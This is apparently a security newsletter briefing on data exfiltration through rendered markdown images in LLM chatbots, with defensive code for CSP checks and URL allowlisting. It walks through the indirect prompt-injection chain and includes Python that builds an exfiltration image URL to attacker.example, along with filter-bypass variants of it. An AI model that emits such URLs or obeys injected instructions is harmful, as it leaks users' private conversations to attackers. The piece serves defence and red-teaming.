AI Sec Weekly

How LLM Chatbots Leak Data Through Their Own Rendered Output

A recurring AI-security finding: an injected instruction makes the model emit a markdown image whose URL carries the user's data to an attacker server.

By AI Sec Weekly Editorial · 8 min read

One vulnerability class keeps reappearing in AI-security write-ups under slightly different names, across many different chatbot products: data exfiltration through the model’s own rendered output. It is worth a standalone briefing because the root cause is almost never the model — it is the rendering layer the product team built around the model, and the fix is a web-security control most LLM teams have not applied to the chat surface.

The attack, end to end

The setup requires two ingredients that modern assistants routinely provide: the model can be influenced by untrusted content (via indirect prompt injection — a web page, a document, an email it processes), and the UI renders the model’s markdown, including images.

The chain:

  1. A user asks the assistant to summarize an attacker-controlled document or web page.
  2. Hidden text in that content instructs the model: take the user’s earlier messages (or retrieved private context) and append them, URL-encoded, to an image link pointing at an attacker server.
  3. The model, following the injected instruction, emits a markdown inline image whose URL is https://attacker.example/log?d=<the user's data, url-encoded>.
  4. The chat UI renders the markdown. To display the “image,” the browser issues a GET request to the attacker’s server. The data is now in the attacker’s logs. No click is required; rendering is the trigger.

The user sees, at most, a broken image icon. The exfiltration already happened.
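
To make steps 2 through 4 concrete, here is a minimal Python sketch of what the injected instruction asks the model to produce and what the attacker reads back from the access log. The endpoint mirrors the example URL in step 3. The function names and the sample text are hypothetical, chosen only for illustration.

```python
from urllib.parse import parse_qs, quote, urlsplit

# Hypothetical attacker endpoint, matching the example URL in step 3.
ATTACKER_ENDPOINT = "https://attacker.example/log"


def build_exfil_markdown(stolen_text: str) -> str:
    """Return the markdown image an injected model is instructed to emit."""
    # safe="" percent-encodes every reserved character (spaces, &, /, ?),
    # so the whole text survives as a single query parameter.
    payload = quote(stolen_text, safe="")
    return f"![]({ATTACKER_ENDPOINT}?d={payload})"


def recover_from_request_url(url: str) -> str:
    """Decode the data from the URL the browser requested."""
    return parse_qs(urlsplit(url).query)["d"][0]


markdown = build_exfil_markdown("meeting moved to 3pm & budget is 40k")
requested_url = markdown[len("![]("):-1]  # the URL the renderer would fetch
print(markdown)
print(recover_from_request_url(requested_url))
```

Nothing here needs JavaScript or a click. The only capability the attacker needs from the UI is that it fetches image URLs found in model output.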

Why this keeps shipping

It recurs because the model and the UI are usually built by people reasoning about different threats. The model team is focused on what the model says. The UI team renders markdown because it makes responses look good. Neither owns the question “what happens when the model is induced to emit an attacker-chosen URL and our renderer dutifully fetches it.” The vulnerability lives in the seam between them, which is exactly the seam nobody is assigned to defend.

Output filtering at the model layer helps but is not sufficient — it is the same losing game as filtering injection on the input side. A determined payload will find an emission the filter does not catch.
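
A small sketch of why output filtering alone tends to lose: the filter below is a hypothetical, deliberately naive regex that strips inline markdown images. It catches the textbook payload but misses the same URL expressed as a reference-style image or as raw HTML. Whether raw HTML is rendered at all depends on the markdown renderer in use, so treat that case as an assumption.

```python
import re

# Naive filter: remove inline markdown images that point at http(s) URLs.
INLINE_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*https?://[^)]*\)")


def naive_filter(model_output: str) -> str:
    """Replace inline remote images with a placeholder."""
    return INLINE_IMAGE.sub("[image removed]", model_output)


# The textbook payload: caught by the filter.
inline = "Summary done. ![x](https://attacker.example/log?d=secret)"
# Reference-style image: the URL sits in a separate definition line.
reference = "Summary done. ![x][r]\n\n[r]: https://attacker.example/log?d=secret"
# Raw HTML image tag, for renderers that pass HTML through.
html = 'Summary done. <img src="https://attacker.example/log?d=secret">'

for name, text in [("inline", inline), ("reference", reference), ("html", html)]:
    leaked = "attacker.example" in naive_filter(text)
    print(f"{name}: attacker URL survives filter = {leaked}")
```

Each bypass can be patched individually, but the filter has to anticipate every syntax the renderer accepts, while the attacker only has to find one it missed.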

The real fix is a browser control, not a model control

The durable mitigation is to deny the rendering layer the ability to make arbitrary outbound requests on the model’s behalf:

  • Content Security Policy. A restrictive img-src (and connect-src, frame-src, style-src) that allows only your own asset origins means an attacker-chosen image URL simply does not load. The browser refuses the request. This converts a working exfiltration channel into an inert broken-image icon. It is the highest-leverage control and most chat UIs ship without it.
  • URL allowlisting in the renderer. Before rendering model output, rewrite or strip image and link targets that are not on an allowlist. Defense in depth behind CSP, useful where CSP is hard to scope tightly.
  • Don’t auto-load remote media in chat at all. Many assistants have no legitimate need to inline arbitrary remote images from model output. Click-to-load, or no remote media, removes the channel entirely.
  • Treat model output as untrusted before it touches the DOM. The same principle as tool calls: anything the model emits that becomes a network request must clear a non-model check first.
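
The allowlisting bullet can be sketched as a single non-model check that the renderer calls on every image target after parsing, so it does not depend on which markdown or HTML syntax produced the URL. This is a minimal Python sketch under stated assumptions: the host assets.example.com and the function name are hypothetical, and the check deliberately fails closed by rejecting relative and protocol-relative URLs.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist: the only hosts this chat UI needs images from.
ALLOWED_IMAGE_HOSTS = frozenset({"assets.example.com"})


def is_allowed_image_url(url: str) -> bool:
    """Return True only for absolute https URLs on an allowlisted host."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return False  # unparseable URL: fail closed
    if parts.scheme != "https":
        return False  # rejects http, data:, relative and //host forms
    # Exact match on the parsed hostname, so userinfo tricks such as
    # https://assets.example.com@attacker.example/ do not pass.
    return host in ALLOWED_IMAGE_HOSTS


candidates = [
    "https://assets.example.com/logo.png",
    "https://attacker.example/log?d=secret",
    "https://assets.example.com@attacker.example/x",
    "//attacker.example/x",
]
for candidate in candidates:
    print(candidate, "->", is_allowed_image_url(candidate))
```

A renderer would drop or replace any image whose target fails this check. Matching on the parsed hostname rather than on a string prefix is the design choice that matters, since prefix checks are what lookalike hosts and userinfo tricks defeat.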

What to check this week

  • Open your assistant’s chat UI and inspect the Content-Security-Policy header on the response. If there is no policy at all, or if img-src (or default-src, which img-src falls back to when absent) allows *, you have the channel.
  • Trace what your renderer does with model-emitted markdown images and links. If it fetches them with no allowlist, that is the finding.
  • Add a deliberate test to your red-team set: an injected instruction that asks the model to encode prior context into an image URL. If the request reaches your test server, the vulnerability is live.
  • Prioritize CSP over output filtering. Filtering is an arms race; a tight img-src is a wall.
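
The header check in the first bullet can be roughly automated. The sketch below takes a Content-Security-Policy header value as a string and reports whether image loads are effectively unrestricted. The function names are hypothetical, and treating a bare https: or http: source as too broad is an assumption of this sketch. It ignores Content-Security-Policy-Report-Only (which does not block anything) and pages that send multiple policies.

```python
from typing import Dict, List, Optional

# Sources that let an image load from an attacker-chosen host.
# Assumption: a bare scheme source is treated as equivalent to "*".
BROAD_SOURCES = {"*", "https:", "http:"}


def parse_csp(header_value: str) -> Dict[str, List[str]]:
    """Parse a CSP header value into {directive: [source expressions]}."""
    policy: Dict[str, List[str]] = {}
    for chunk in header_value.split(";"):
        tokens = chunk.split()
        if not tokens:
            continue
        # Directive names are case-insensitive; if a directive is
        # repeated, browsers use the first and ignore the rest.
        policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def image_channel_open(header_value: Optional[str]) -> bool:
    """Return True if the policy would let an arbitrary image URL load."""
    if not header_value:
        return True  # no policy: every image URL is fetched
    policy = parse_csp(header_value)
    # img-src falls back to default-src when it is not set.
    sources = policy.get("img-src", policy.get("default-src"))
    if sources is None:
        return True  # neither directive present: images are unrestricted
    return any(source.lower() in BROAD_SOURCES for source in sources)


print(image_channel_open(None))
print(image_channel_open("default-src 'self'; img-src *"))
print(image_channel_open("default-src 'self'; img-src 'self' https://assets.example.com"))
```

A result of True means the red-team test in the third bullet is likely to reach your test server. A result of False still deserves that test, since this sketch only reads one header and does not exercise the renderer.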

The summary that holds across every product this has hit: you cannot reliably prevent the model from emitting a bad URL, but you can prevent the browser from fetching it. Fix the rendering layer, not just the prompt.

— Theo
